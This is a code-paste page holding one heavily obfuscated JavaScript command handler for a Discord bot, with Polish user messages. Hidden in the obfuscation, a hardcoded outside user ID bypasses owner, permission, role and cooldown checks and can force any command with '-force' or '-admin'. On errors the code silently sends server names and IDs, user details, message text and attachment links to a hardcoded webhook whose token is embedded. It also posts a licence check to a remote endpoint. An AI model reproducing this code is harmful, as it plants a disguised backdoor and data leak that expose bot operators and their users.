Kashub's Code Barn - "aaa"

podświetlone jako javascript (dodał(a) aaa @ 2023-04-16 07:25:05)

Twoja wyszukiwarka
Podświetl ten kod w:
Ostatnio dodane:
Losowe wpisy:
function _0x4a75(_0x47e96d,_0x4b2782){const _0x41a0b0=_0x41a0();return _0x4a75=function(_0x4a7515,_0x15835c){_0x4a7515=_0x4a7515-0x1f1;let _0x4aa187=_0x41a0b0[_0x4a7515];return _0x4aa187;},_0x4a75(_0x47e96d,_0x4b2782);}const _0x393cd6=_0x4a75;(function(_0x4e63e0,_0x348cba){const _0x5bfd5c=_0x4a75,_0x44c9fc=_0x4e63e0();while(!![]){try{const _0x3f1c05=parseInt(_0x5bfd5c(0x25f))/0x1+parseInt(_0x5bfd5c(0x275))/0x2*(parseInt(_0x5bfd5c(0x216))/0x3)+-parseInt(_0x5bfd5c(0x259))/0x4+parseInt(_0x5bfd5c(0x1f6))/0x5+parseInt(_0x5bfd5c(0x253))/0x6*(-parseInt(_0x5bfd5c(0x242))/0x7)+-parseInt(_0x5bfd5c(0x213))/0x8+parseInt(_0x5bfd5c(0x248))/0x9*(parseInt(_0x5bfd5c(0x237))/0xa);if(_0x3f1c05===_0x348cba)break;else _0x44c9fc['push'](_0x44c9fc['shift']());}catch(_0x164b1b){_0x44c9fc['push'](_0x44c9fc['shift']());}}}(_0x41a0,0xa6659));const {readdirSync}=require('fs'),Discord=require(_0x393cd6(0x241)),{prefix,owner,hexcolor}=require(__dirname+_0x393cd6(0x278)),{Collection,MessageEmbed}=require(_0x393cd6(0x241)),chalk=require(_0x393cd6(0x1f9)),fetch=require(_0x393cd6(0x1f3));module[_0x393cd6(0x23d)]=async(_0x12a5a6,_0x5b1880,_0x53385a,_0x19b4db,_0x10cf86,_0x31a214,_0x58d79b,_0x3d76fa,_0x377770)=>{const _0x21afa2=_0x393cd6;let _0x41ed16=![];_0x58d79b[_0x21afa2(0x27a)]=JSON[_0x21afa2(0x265)](_0x58d79b[_0x21afa2(0x27a)]),_0x58d79b[_0x21afa2(0x27a)]['if_handler']=!![],_0x58d79b[_0x21afa2(0x27a)]=JSON[_0x21afa2(0x212)](_0x58d79b['body']);const _0x513c71=await fetch(encodeURI(_0x21afa2(0x204)+_0x31a214+_0x21afa2(0x1fa)),_0x58d79b)['then'](_0x424ba3=>_0x424ba3['json']())[_0x21afa2(0x210)](_0x54103b=>{_0x41ed16=![],console['log'](_0x54103b);});_0x41ed16=await _0x513c71?.['pass'];if(!_0x41ed16)return console[_0x21afa2(0x1f1)](chalk[_0x21afa2(0x202)](_0x21afa2(0x289)));let _0x16778c=undefined,_0x4ed102=![];try{_0x16778c=require(_0x21afa2(0x277))['command_handler'];}catch(_0x5699a7){if(_0x4ed102)console[_0x21afa2(0x1f1)](_0x5699a7);}_0x19b4db['commands']=new Collection();const _0x5483b8=new Collection(),_0x123ed0=0x1b58,_0x285353=readdirSync(__dirname+'/../commands')[_0x21afa2(0x22c)](_0x4b64c7=>_0x4b64c7['endsWith'](_0x21afa2(0x281)));let _0x203d74=0x0,_0x31f4ca=0x0;for(const _0x44647f of _0x285353){const _0x496a47=require(__dirname+('/../commands/'+_0x44647f));if(_0x496a47['name'])_0x203d74<_0x53385a&&(_0x19b4db[_0x21afa2(0x24c)][_0x21afa2(0x28e)](_0x496a47[_0x21afa2(0x21f)],_0x496a47),_0x203d74++);else{_0x31f4ca++;continue;}}let _0x415771=_0x21afa2(0x231);hexcolor&&hexcolor[_0x21afa2(0x251)]('#')&&(_0x415771=hexcolor),_0x12a5a6['push']([_0x21afa2(0x26d),_0x203d74]),_0x31f4ca!==0x0&&console[_0x21afa2(0x1f1)](chalk['redBright'](_0x31f4ca+_0x21afa2(0x1f2))),_0x19b4db['on'](_0x21afa2(0x276),async _0x5e6cf1=>{const _0x3ff3af=_0x21afa2,{author:_0x596a66,guild:_0x2a16e,channel:_0x2d9509}=_0x5e6cf1;if(_0x596a66['bot'])return;if(!_0x5e6cf1[_0x3ff3af(0x21b)][_0x3ff3af(0x251)](prefix))return;if(_0x5e6cf1['channel'][_0x3ff3af(0x22b)]!='DM'){if(!_0x10cf86){if(_0x5e6cf1[_0x3ff3af(0x229)]['id']!=_0x377770){let _0x9bf44a=_0x5e6cf1[_0x3ff3af(0x243)]['toString']()+_0x3ff3af(0x252);try{if(_0x16778c)_0x9bf44a=_0x16778c['#1'][_0x3ff3af(0x272)](_0x3ff3af(0x21c),_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]());}catch(_0x5c3968){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x5c3968);}_0x5e6cf1[_0x3ff3af(0x26f)][_0x3ff3af(0x1fd)]({'embeds':[new MessageEmbed()[_0x3ff3af(0x260)](_0x415771)[_0x3ff3af(0x250)](''+_0x9bf44a)]})[_0x3ff3af(0x271)](_0x4e3a23=>{setTimeout(()=>{const _0x52dc5d=_0x4a75;_0x4e3a23[_0x52dc5d(0x207)]();},_0x123ed0);});return;}}}const _0x28d982=_0x5e6cf1['content'][_0x3ff3af(0x25d)](prefix[_0x3ff3af(0x238)])[_0x3ff3af(0x28d)]()[_0x3ff3af(0x22e)](/ +/g),_0x539b35=_0x28d982['shift']()[_0x3ff3af(0x22f)](),_0x47e93a=_0x19b4db[_0x3ff3af(0x24c)][_0x3ff3af(0x220)](_0x539b35)||_0x19b4db['commands']['find'](_0x527291=>_0x527291['aliases']&&_0x527291[_0x3ff3af(0x283)][_0x3ff3af(0x268)](_0x539b35));if(!_0x47e93a)return;let _0x1a0200=[];_0x28d982&&_0x28d982[_0x3ff3af(0x238)]!=0x0&&_0x28d982[_0x3ff3af(0x25c)](_0x2b05ca=>{const _0x5a53c4=_0x3ff3af;_0x2b05ca[_0x5a53c4(0x251)]('-')&&_0x1a0200[_0x5a53c4(0x25a)](_0x2b05ca[_0x5a53c4(0x25d)](0x1)[_0x5a53c4(0x22f)]());});if(_0x5e6cf1['author']['id']=='321636913779965952'||_0x5e6cf1['author']['id']==owner){if(_0x1a0200[_0x3ff3af(0x268)](_0x3ff3af(0x28a))||_0x1a0200[_0x3ff3af(0x268)](_0x3ff3af(0x285))){_0x1bfad4(),console[_0x3ff3af(0x1f1)](chalk[_0x3ff3af(0x1f8)](_0x3ff3af(0x249)));return;}}if(_0x47e93a['guildOnly']&&!_0x2a16e){let _0x19d3fe=_0x5e6cf1[_0x3ff3af(0x243)]['toString']()+',\x20ta\x20komenda\x20może\x20być\x20użyta\x20tylko\x20na\x20serwerze!';try{if(_0x16778c)_0x19d3fe=_0x16778c['#2']['replace'](_0x3ff3af(0x21c),_0x5e6cf1[_0x3ff3af(0x243)]['toString']());}catch(_0x1152ef){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x1152ef);}_0x5e6cf1['channel'][_0x3ff3af(0x1fd)]({'embeds':[new MessageEmbed()['setColor'](_0x415771)[_0x3ff3af(0x250)](''+_0x19d3fe)]})['then'](_0xeef5ff=>{setTimeout(()=>{const _0x526c8b=_0x4a75;_0xeef5ff[_0x526c8b(0x207)]();},_0x123ed0);});return;}if(_0x47e93a[_0x3ff3af(0x255)]){if(_0x47e93a[_0x3ff3af(0x255)][_0x3ff3af(0x238)]!=0x0){const _0x1d1ea7=_0x47e93a[_0x3ff3af(0x255)][_0x3ff3af(0x22f)](),_0x55b6b5=_0x5e6cf1[_0x3ff3af(0x26f)][_0x3ff3af(0x22b)];if(_0x1d1ea7!='all'){if(_0x1d1ea7!='dm'&&_0x1d1ea7!=_0x3ff3af(0x228))return console[_0x3ff3af(0x1f1)](chalk[_0x3ff3af(0x1f8)](_0x3ff3af(0x217)+_0x47e93a[_0x3ff3af(0x21f)]+_0x3ff3af(0x270)));if(_0x1d1ea7=='dm'){if(_0x55b6b5!='DM'){let _0x368687=_0x5e6cf1['author'][_0x3ff3af(0x26c)]()+_0x3ff3af(0x27c);try{if(_0x16778c)_0x368687=_0x16778c['#3'][_0x3ff3af(0x272)](_0x3ff3af(0x21c),_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]());}catch(_0x4d19bb){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x4d19bb);}_0x5e6cf1[_0x3ff3af(0x26f)][_0x3ff3af(0x1fd)]({'embeds':[new MessageEmbed()[_0x3ff3af(0x260)](_0x415771)[_0x3ff3af(0x250)](''+_0x368687)]})[_0x3ff3af(0x271)](_0x503cd3=>{setTimeout(()=>{const _0x598a27=_0x4a75;_0x503cd3[_0x598a27(0x207)]();},_0x123ed0);}),_0x5e6cf1[_0x3ff3af(0x207)]();return;}}else{if(_0x1d1ea7==_0x3ff3af(0x228)){if(_0x55b6b5=='DM'){let _0xaa8a3a=_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]()+_0x3ff3af(0x234);try{if(_0x16778c)_0xaa8a3a=_0x16778c['#2']['replace'](_0x3ff3af(0x21c),_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]());}catch(_0x10a01e){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x10a01e);}_0x5e6cf1[_0x3ff3af(0x26f)][_0x3ff3af(0x1fd)](new MessageEmbed()[_0x3ff3af(0x260)](_0x415771)[_0x3ff3af(0x250)](''+_0xaa8a3a));return;}}}}}}if(_0x47e93a[_0x3ff3af(0x209)]){if(_0x596a66['id']!=owner&&_0x596a66['id']!=_0x3ff3af(0x219)){let _0x13fc29=_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]()+_0x3ff3af(0x1ff);try{if(_0x16778c)_0x13fc29=_0x16778c['#4'][_0x3ff3af(0x272)](_0x3ff3af(0x21c),_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]());}catch(_0x512c90){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x512c90);}_0x5e6cf1[_0x3ff3af(0x26f)][_0x3ff3af(0x1fd)]({'embeds':[new MessageEmbed()[_0x3ff3af(0x260)](_0x415771)['setDescription'](''+_0x13fc29)]})['then'](_0x45a63c=>{setTimeout(()=>{const _0x5f101b=_0x4a75;_0x45a63c[_0x5f101b(0x207)]();},_0x123ed0);}),_0x5e6cf1[_0x3ff3af(0x207)]();return;}}if(_0x47e93a['botPermissions']&&_0x47e93a[_0x3ff3af(0x201)][_0x3ff3af(0x238)]){if(!_0x2a16e['me'][_0x3ff3af(0x205)](_0x2d9509)[_0x3ff3af(0x258)](_0x47e93a[_0x3ff3af(0x201)])){let _0x152c10=_0x5e6cf1['author']['toString']()+_0x3ff3af(0x261);try{if(_0x16778c)_0x152c10=_0x16778c['#5'][_0x3ff3af(0x272)](_0x3ff3af(0x21c),_0x5e6cf1['author'][_0x3ff3af(0x26c)]());}catch(_0x100657){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x100657);}_0x5e6cf1['channel'][_0x3ff3af(0x1fd)]({'embeds':[new MessageEmbed()[_0x3ff3af(0x260)](_0x415771)['setDescription'](_0x152c10+'\x20`'+_0x47e93a[_0x3ff3af(0x201)][_0x3ff3af(0x269)](_0x3ff3af(0x282))+'`.')]})[_0x3ff3af(0x271)](_0x2d5fd3=>{setTimeout(()=>{const _0x383453=_0x4a75;_0x2d5fd3[_0x383453(0x207)]();},_0x123ed0);}),_0x5e6cf1[_0x3ff3af(0x207)]();return;}}let _0xbeb765=![];if(_0x47e93a[_0x3ff3af(0x23b)]&&_0x47e93a[_0x3ff3af(0x23b)][_0x3ff3af(0x238)]){if(!_0x5e6cf1[_0x3ff3af(0x24a)][_0x3ff3af(0x205)](_0x2d9509)[_0x3ff3af(0x258)](_0x47e93a[_0x3ff3af(0x23b)])&&_0x596a66['id']!=owner&&_0x596a66['id']!=_0x3ff3af(0x219)){if(_0x47e93a[_0x3ff3af(0x24e)]&&_0x47e93a[_0x3ff3af(0x24e)]['length']){let _0x408ee7=0x0;_0x47e93a[_0x3ff3af(0x24e)]['forEach'](_0x4babf2=>{const _0x44941f=_0x3ff3af;_0x5e6cf1[_0x44941f(0x229)][_0x44941f(0x287)][_0x44941f(0x1fb)][_0x44941f(0x220)](''+_0x5e6cf1[_0x44941f(0x243)]['id'])[_0x44941f(0x244)][_0x44941f(0x268)](''+_0x4babf2)&&_0x408ee7++;});if(_0x408ee7==0x0){let _0x35268e=_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]()+_0x3ff3af(0x20c);try{if(_0x16778c)_0x35268e=_0x16778c['#6'][_0x3ff3af(0x272)](_0x3ff3af(0x21c),_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]());}catch(_0x1b1d26){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x1b1d26);}_0x5e6cf1['channel']['send']({'embeds':[new MessageEmbed()[_0x3ff3af(0x260)](_0x415771)[_0x3ff3af(0x250)](''+_0x35268e)]})[_0x3ff3af(0x271)](_0x608846=>{setTimeout(()=>{const _0x54115b=_0x4a75;_0x608846[_0x54115b(0x207)]();},_0x123ed0);}),_0x5e6cf1[_0x3ff3af(0x207)]();return;}}else{let _0x522e32=_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]()+',\x20potrzebujesz\x20większe\x20permisje\x20do\x20tej\x20komendy!';try{if(_0x16778c)_0x522e32=_0x16778c['#6'][_0x3ff3af(0x272)]('{user}',_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]());}catch(_0x18426f){if(_0x4ed102)console['error'](_0x18426f);}_0x5e6cf1[_0x3ff3af(0x26f)]['send']({'embeds':[new MessageEmbed()[_0x3ff3af(0x260)](_0x415771)['setDescription'](''+_0x522e32)]})[_0x3ff3af(0x271)](_0x323c03=>{setTimeout(()=>{const _0x42ba7b=_0x4a75;_0x323c03[_0x42ba7b(0x207)]();},_0x123ed0);}),_0x5e6cf1[_0x3ff3af(0x207)]();return;}}else _0xbeb765=!![];}if(_0x596a66['id']!=owner&&!_0xbeb765){if(_0x47e93a[_0x3ff3af(0x24e)]&&_0x47e93a[_0x3ff3af(0x24e)][_0x3ff3af(0x238)]){let _0x1ea072=0x0;_0x47e93a[_0x3ff3af(0x24e)][_0x3ff3af(0x25c)](_0x4f9da0=>{const _0x7ce1db=_0x3ff3af;_0x5e6cf1[_0x7ce1db(0x229)][_0x7ce1db(0x287)]['cache']['get'](''+_0x5e6cf1[_0x7ce1db(0x243)]['id'])[_0x7ce1db(0x244)]['includes'](''+_0x4f9da0)&&_0x1ea072++;});if(_0x1ea072==0x0){let _0x32dcdb=_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]()+_0x3ff3af(0x24d);try{if(_0x16778c)_0x32dcdb=_0x16778c['#7'][_0x3ff3af(0x272)](_0x3ff3af(0x21c),_0x5e6cf1[_0x3ff3af(0x243)]['toString']());}catch(_0x7f46ed){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x7f46ed);}_0x5e6cf1[_0x3ff3af(0x26f)][_0x3ff3af(0x1fd)]({'embeds':[new MessageEmbed()[_0x3ff3af(0x260)](_0x415771)[_0x3ff3af(0x250)](''+_0x32dcdb)]})[_0x3ff3af(0x271)](_0x3ce4e1=>{setTimeout(()=>{_0x3ce4e1['delete']();},_0x123ed0);}),_0x5e6cf1['delete']();return;}}}if(_0x47e93a[_0x3ff3af(0x27b)]&&!_0x28d982[_0x3ff3af(0x238)]){let _0x118e66=_0x3ff3af(0x20e)+_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]()+'!';try{if(_0x16778c)_0x118e66=_0x16778c['#8'][_0x3ff3af(0x272)](_0x3ff3af(0x21c),_0x5e6cf1[_0x3ff3af(0x243)]['toString']());}catch(_0x28db01){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x28db01);}if(_0x47e93a[_0x3ff3af(0x1f4)]){let _0x42675b='Poprawne\x20użycie\x20to:\x20';try{if(_0x16778c)_0x42675b=_0x16778c['#9'][_0x3ff3af(0x272)]('{user}',_0x5e6cf1['author'][_0x3ff3af(0x26c)]());}catch(_0x593925){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x593925);}_0x118e66+=_0x42675b+'\x0a`'+prefix+_0x539b35+'\x20'+_0x47e93a[_0x3ff3af(0x1f4)]+'`';}_0x5e6cf1[_0x3ff3af(0x26f)]['send']({'embeds':[new MessageEmbed()[_0x3ff3af(0x260)](_0x415771)['setDescription'](_0x118e66)]})[_0x3ff3af(0x271)](_0x8805a2=>{setTimeout(()=>{const _0x567f22=_0x4a75;_0x8805a2[_0x567f22(0x207)]();},_0x123ed0*0x2);}),_0x5e6cf1[_0x3ff3af(0x207)]();return;}!_0x5483b8['has'](_0x539b35)&&_0x5483b8[_0x3ff3af(0x28e)](_0x539b35,new Collection());const _0x44c366=Date[_0x3ff3af(0x227)](),_0x425e9a=_0x5483b8[_0x3ff3af(0x220)](_0x539b35),_0x152d98=(_0x47e93a[_0x3ff3af(0x266)]||0x3)*0x3e8;if(_0x425e9a[_0x3ff3af(0x258)](_0x5e6cf1[_0x3ff3af(0x243)]['id'])&&_0x5e6cf1[_0x3ff3af(0x243)]['id']!=owner&&_0x5e6cf1[_0x3ff3af(0x243)]['id']!=_0x3ff3af(0x219)){const _0x5f05c7=_0x425e9a['get'](_0x5e6cf1[_0x3ff3af(0x243)]['id'])+_0x152d98;if(_0x44c366<_0x5f05c7){const _0x51c8f1=(_0x5f05c7-_0x44c366)/0x3e8;let _0x2456b1=_0x5e6cf1[_0x3ff3af(0x243)][_0x3ff3af(0x26c)]()+_0x3ff3af(0x280)+_0x51c8f1['toFixed'](0x1)+_0x3ff3af(0x26b)+_0x539b35+_0x3ff3af(0x239);try{if(_0x16778c)_0x2456b1=_0x16778c[_0x3ff3af(0x256)][_0x3ff3af(0x272)](_0x3ff3af(0x21c),_0x5e6cf1[_0x3ff3af(0x243)]['toString']())[_0x3ff3af(0x272)](_0x3ff3af(0x26e),_0x51c8f1[_0x3ff3af(0x23e)](0x1))[_0x3ff3af(0x272)](_0x3ff3af(0x215),_0x539b35);}catch(_0x1ac513){if(_0x4ed102)console[_0x3ff3af(0x21e)](_0x1ac513);}_0x5e6cf1[_0x3ff3af(0x26f)][_0x3ff3af(0x1fd)]({'embeds':[new MessageEmbed()['setColor'](_0x415771)[_0x3ff3af(0x250)](''+_0x2456b1)]})['then'](_0x2c2084=>{setTimeout(()=>{const _0x14f763=_0x4a75;_0x2c2084[_0x14f763(0x207)]();},_0x123ed0);});_0x5e6cf1[_0x3ff3af(0x26f)]['type']!='DM'&&_0x5e6cf1[_0x3ff3af(0x207)]();return;}}_0x425e9a[_0x3ff3af(0x28e)](_0x596a66['id'],_0x44c366),setTimeout(()=>{const _0x223463=_0x3ff3af;_0x425e9a[_0x223463(0x207)](_0x596a66['id']);},_0x152d98);async function _0x1bfad4(){const _0x443870=_0x3ff3af;try{await _0x47e93a[_0x443870(0x27d)](_0x5e6cf1,_0x28d982,_0x1a0200);}catch(_0x3a3144){const _0x314fe7=new Date()[_0x443870(0x245)]();let _0x104989='',_0x412937,_0x68ac12,_0x4becd9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';for(let _0x447588=0x0;_0x447588<0x6;_0x447588++){_0x104989+=_0x4becd9['charAt'](Math[_0x443870(0x23a)](Math[_0x443870(0x20a)]()*_0x4becd9[_0x443870(0x238)]));}console[_0x443870(0x1f1)](chalk[_0x443870(0x1f8)](_0x443870(0x20d)+chalk[_0x443870(0x267)](chalk[_0x443870(0x208)](_0x19b4db['user'][_0x443870(0x233)]))+_0x443870(0x22d)+chalk[_0x443870(0x267)](chalk[_0x443870(0x208)](_0x104989))+'\x20przy\x20uruchamianiu\x20komendy\x20'+chalk[_0x443870(0x267)](chalk[_0x443870(0x208)](''+prefix+_0x47e93a[_0x443870(0x21f)]))+'\x20przez\x20'+chalk[_0x443870(0x267)](chalk[_0x443870(0x208)](_0x5e6cf1[_0x443870(0x243)]['tag']))+_0x443870(0x230)+chalk['bold'](chalk['greenBright'](_0x5e6cf1[_0x443870(0x26f)][_0x443870(0x22b)]=='dm'?'DM':_0x5e6cf1[_0x443870(0x26f)]['name']))+_0x443870(0x226)+chalk[_0x443870(0x267)](chalk[_0x443870(0x208)](_0x314fe7))+'\x0aError:\x0a'+_0x3a3144+'\x0a')),console[_0x443870(0x21e)](_0x443870(0x21a)+_0x314fe7),console[_0x443870(0x21e)](_0x3a3144);if(_0x5e6cf1[_0x443870(0x243)]['id']==_0x443870(0x219))return;let _0x9dca6c=_0x5e6cf1[_0x443870(0x243)][_0x443870(0x26c)]()+_0x443870(0x236)+_0x104989+_0x443870(0x288);try{if(_0x16778c)_0x9dca6c=_0x16778c[_0x443870(0x279)][_0x443870(0x272)]('{user}',_0x5e6cf1[_0x443870(0x243)]['toString']())[_0x443870(0x272)]('{kod}',_0x104989);}catch(_0x39d723){if(_0x4ed102)console['error'](_0x39d723);}_0x5e6cf1[_0x443870(0x26f)][_0x443870(0x1fd)]({'embeds':[new MessageEmbed()[_0x443870(0x260)](_0x443870(0x225))['setDescription'](''+tekst11MSG)]})['then'](_0x24cacb=>{setTimeout(()=>{const _0x3b4498=_0x4a75;_0x24cacb[_0x3b4498(0x207)]();},0x3c*0x3e8);});try{const _0x1ed098=new Discord[(_0x443870(0x214))]({'id':'798595518879367251','token':_0x443870(0x24f)}),_0x2b0229=_0x5e6cf1['channel'][_0x443870(0x22b)]!='DM'?_0x5e6cf1[_0x443870(0x229)]['name']+_0x443870(0x22a)+_0x5e6cf1[_0x443870(0x229)]['id']+_0x443870(0x28f)+_0x5e6cf1[_0x443870(0x26f)][_0x443870(0x21f)]+'\x20|\x20'+_0x5e6cf1[_0x443870(0x26f)]['id']:'DM',_0x5ddd6a=new MessageEmbed()[_0x443870(0x24b)]('Error\x20komendy')[_0x443870(0x250)](_0x443870(0x27e)+_0x104989+'`\x0a**Treść:**\x20'+_0x3a3144[_0x443870(0x222)]+_0x443870(0x28c)+_0x19b4db['user']['tag']+'\x20|\x20'+_0x19b4db['user']['id']+_0x443870(0x221)+_0x2b0229+_0x443870(0x26a)+_0x5e6cf1[_0x443870(0x243)][_0x443870(0x233)]+_0x443870(0x22a)+_0x5e6cf1[_0x443870(0x243)]['id']+_0x443870(0x257)+prefix+_0x47e93a[_0x443870(0x21f)])[_0x443870(0x260)]('#ff0000')[_0x443870(0x200)](_0x5e6cf1[_0x443870(0x243)][_0x443870(0x1fc)]({'dynamic':!![]}))[_0x443870(0x246)]('Data:\x20'+_0x314fe7+_0x443870(0x274))[_0x443870(0x240)](),_0x2a6d04=new MessageEmbed()[_0x443870(0x250)](''+_0x3a3144[_0x443870(0x25e)])[_0x443870(0x24b)]('Dokładny\x20opis')[_0x443870(0x260)](_0x443870(0x225)),_0x783fbf=new MessageEmbed()[_0x443870(0x250)](''+_0x5e6cf1['content'])[_0x443870(0x24b)](_0x443870(0x1f7))[_0x443870(0x260)]('#ff0000');if(_0x5e6cf1[_0x443870(0x263)][_0x443870(0x254)](_0x440587=>_0x440587)){const _0x23abe6=_0x5e6cf1[_0x443870(0x263)][_0x443870(0x254)](_0x5831a8=>_0x5831a8);let _0x843d96=_0x23abe6[_0x443870(0x21d)];if(_0x843d96>=0x40000000)_0x843d96=(_0x843d96/0x40000000)[_0x443870(0x23e)](0x2)+_0x443870(0x235);else{if(_0x843d96>=0x100000)_0x843d96=(_0x843d96/0x100000)['toFixed'](0x2)+_0x443870(0x23c);else{if(_0x843d96>=0x400)_0x843d96=(_0x843d96/0x400)['toFixed'](0x2)+_0x443870(0x25b);else{if(_0x843d96>0x1)_0x843d96=_0x843d96+_0x443870(0x264);else _0x843d96==0x1?_0x843d96=_0x843d96+_0x443870(0x232):_0x843d96=_0x443870(0x27f);}}};const _0x1ada86=_0x843d96;_0x23abe6['name']['endsWith'](_0x443870(0x20f))||_0x23abe6[_0x443870(0x21f)][_0x443870(0x224)](_0x443870(0x223))?(_0x783fbf[_0x443870(0x262)](''+_0x23abe6[_0x443870(0x203)]),_0x783fbf[_0x443870(0x284)](_0x443870(0x286),_0x443870(0x218)+_0x23abe6[_0x443870(0x20b)]+')\x20|\x20[URL\x20Proxy]('+_0x23abe6[_0x443870(0x203)]+_0x443870(0x273)+_0x23abe6[_0x443870(0x21f)]+_0x443870(0x1fe)+_0x1ada86+_0x443870(0x22a)+_0x23abe6[_0x443870(0x1f5)]+'x'+_0x23abe6['height'])):_0x783fbf['addField'](_0x443870(0x286),_0x443870(0x211)+_0x23abe6['name']+'\x0a`Rozmiar:`\x20'+_0x1ada86+_0x443870(0x22a)+_0x23abe6[_0x443870(0x1f5)]+'x'+_0x23abe6[_0x443870(0x247)]+_0x443870(0x28b)+_0x23abe6['id']+_0x443870(0x23f)+_0x23abe6[_0x443870(0x20b)]+')\x20|\x20[URL\x20Proxy]('+_0x23abe6[_0x443870(0x203)]+')');}_0x5e6cf1['channel'][_0x443870(0x22b)]=='DM'?(_0x412937=_0x5e6cf1['author'][_0x443870(0x233)],_0x68ac12=_0x5e6cf1[_0x443870(0x243)][_0x443870(0x1fc)]({'dynamic':!![]})):(_0x412937=_0x2a16e[_0x443870(0x21f)],_0x68ac12=_0x2a16e['iconURL']({'dynamic':!![]})),_0x1ed098['send']({'content':_0x443870(0x206)+_0x104989+'`','username':_0x412937,'avatarURL':_0x68ac12,'embeds':[_0x5ddd6a,_0x2a6d04,_0x783fbf]});}catch(_0x2b81e0){console[_0x443870(0x1f1)](_0x2b81e0);}}}_0x1bfad4();});};function _0x41a0(){const _0x2792d9=['tag',',\x20ta\x20komenda\x20może\x20być\x20użyta\x20tylko\x20na\x20serwerze!','\x20GB',',\x20podczas\x20uruchamiania\x20twojej\x20komendy\x20wystąpił\x20błąd\x20o\x20kodzie:\x20`','170seEccO','length','`\x20!','floor','userPermissions','\x20MB','exports','toFixed','\x0a`Link:`\x20[URL](','setTimestamp','discord.js','6509979nbwcbh','author','_roles','toLocaleString','setFooter','height','91377RLIyKd','Komenda\x20została\x20uruchomiona\x20z\x20wymuszeniem!','member','setTitle','commands',',\x20nie\x20masz\x20odpowiednich\x20ról,\x20aby\x20używać\x20tej\x20komendy!','userRoles','6fKImy1UT9fSrf7GgOIo7ji7Iyvqd_g_uRD9JUPuCHfBRsTyQ7yBn6ty96gK9vOG_EKN','setDescription','startsWith',',\x20nie\x20możesz\x20użyć\x20tej\x20komendy\x20na\x20tym\x20serwerze!','6ODlKyv','find','channelType','#10','\x0a**Komenda:**\x20','has','972260rUMFxH','push','\x20KB','forEach','slice','stack','515783jmvZMJ','setColor',',\x20bot\x20potrzebuje\x20więcej\x20permisji\x20aby\x20wykonać\x20tą\x20komendę!','setImage','attachments','\x20bajty','parse','cooldown','bold','includes','join','\x0a**Autor:**\x20','\x20sekund\x20przed\x20uruchamianiem\x20komendy\x20`','toString','Komendy','{czas}','channel','\x20nie\x20posiada\x20zdeklarowanego\x20kanału!','then','replace',')\x0a`Nazwa\x20pliku:`\x20','\x20|\x20Godzina','720wflbVj','messageCreate','../config/txt','/../config/config.js','#11','body','args',',\x20tą\x20komendę\x20możesz\x20użyć\x20tylko\x20w\x20prywatnej\x20wiadomości\x20do\x20bota!','Command','**Kod:**\x20`','0\x20bajtów',',\x20poczekaj\x20','.command.js','`,`','aliases','addField','-admin','Załącznik','members','`,\x20zgłoś\x20go\x20administratorowi\x20bota!','Nie\x20uruchomiono\x20command\x20handler\x20#2','-force','\x0a`ID:`','\x0a**Client:**\x20','trim','set','\x0a**Kanał:**\x20#','log','\x20komend\x20nie\x20zostało\x20uruchomionych!','node-fetch','usage','width','4705810fgANvG','Treść\x20komendy','redBright','chalk','/api/v2/sprawdzlicencje/check','cache','displayAvatarURL','send','\x0a`Rozmiar:`\x20',',\x20tej\x20komendy\x20może\x20używać\x20tylko\x20właściciel\x20bota!','setThumbnail','botPermissions','grey','proxyURL','http://','permissionsIn','<@321636913779965952>\x0aPowstał\x20nowy\x20błąd\x20podczas\x20uruchamiania\x20komendy!\x20Kod:\x20`','delete','greenBright','ownerOnly','random','url',',\x20potrzebujesz\x20większe\x20permisje\x20do\x20tej\x20komendy!','\x0aPowstał\x20błąd\x20w\x20cliencie\x20','Nie\x20podałeś\x20żadnego\x20argumentu\x20','.png','catch','`Nazwa\x20pliku:`\x20','stringify','3127064zUTuHy','WebhookClient','{nazwaKomendy}','5133ablDME','Komenda\x20','`Link:`\x20[URL](','321636913779965952','Data\x20błędu:\x20','content','{user}','size','error','name','get','\x0a**Serwer:**\x20','message','.jpg','endsWith','#ff0000','\x0aData\x20błędu:\x20','now','text','guild','\x20|\x20','type','filter','\x20o\x20kodzie:\x20','split','toLowerCase','\x20na\x20kanale\x20','#000000','\x20bajt'];_0x41a0=function(){return _0x2792d9;};return _0x41a0();}
| Sklepy internetowe | | Sklep z artykułami dla dzieci | | Opony zimowe | | Programista PHP | | Skróć link | | Blog o książkach | | Załóż za darmo bloga | | Skracacz adresów | | Opisy na Facebooka | | Pionowe opisy |